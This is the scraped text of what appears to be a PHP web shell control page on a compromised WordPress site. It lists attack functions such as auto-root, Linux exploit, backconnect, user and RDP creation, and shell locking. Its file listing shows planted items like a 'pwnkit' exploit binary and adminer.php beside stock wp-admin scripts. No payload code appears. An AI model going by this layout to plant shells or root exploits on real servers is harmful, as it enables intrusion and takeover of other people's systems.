Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
leranch /
wp-admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
cat.js
556
B
-rwxr--r--
categories.js
658
B
-rwxr--r--
comment.js
897
B
-rwxr--r--
common.js
1.26
KB
-rwxr--r--
custom-fields.js
968
B
-rwxr--r--
dbx-admin-key.js
1.76
KB
-rwxr--r--
edit-comments.js
2.53
KB
-rwxr--r--
editor.js
7.44
KB
-rwxr--r--
forms.js
859
B
-rwxr--r--
gallery.js
684
B
-rwxr--r--
link-cat.js
778
B
-rwxr--r--
link.js
1.7
KB
-rwxr--r--
media-upload.js
1.64
KB
-rwxr--r--
page.js
1.09
KB
-rwxr--r--
password-strength-meter.js
2.52
KB
-rwxr--r--
post.js
6.88
KB
-rwxr--r--
postbox.js
549
B
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
revisions-js.php
2.92
KB
-rwxr--r--
slug.js
1.7
KB
-rwxr--r--
tags.js
547
B
-rwxr--r--
theme-preview.js
1.43
KB
-rwxr--r--
upload.js
12.91
KB
-rwxr--r--
users.js
49
B
-rwxr--r--
widgets.js
4.59
KB
-rwxr--r--
word-count.js
967
B
-rwxr--r--
wp-gears.js
2.69
KB
-rwxr--r--
xfn.js
1.26
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-fields.js
jQuery( function($) { var before = function() { var nonce = $('#newmeta [@name=_ajax_nonce]').val(); var postId = $('#post_ID').val(); if ( !nonce || !postId ) { return false; } return [nonce,postId]; } var addBefore = function( s ) { var b = before(); if ( !b ) { return false; } s.data = s.data.replace(/_ajax_nonce=[a-f0-9]+/, '_ajax_nonce=' + b[0]) + '&post_id=' + b[1]; return s; }; var addAfter = function( r, s ) { var postId = $('postid', r).text(); if ( !postId ) { return; } $('#post_ID').attr( 'name', 'post_ID' ).val( postId ); var h = $('#hiddenaction'); if ( 'post' == h.val() ) { h.val( 'postajaxpost' ); } }; var delBefore = function( s ) { var b = before(); if ( !b ) return false; s.data._ajax_nonce = b[0]; s.data.post_id = b[1]; return s; } $('#the-list') .wpList( { addBefore: addBefore, addAfter: addAfter, delBefore: delBefore } ) .find('.updatemeta, .deletemeta').attr( 'type', 'button' ); } );
Close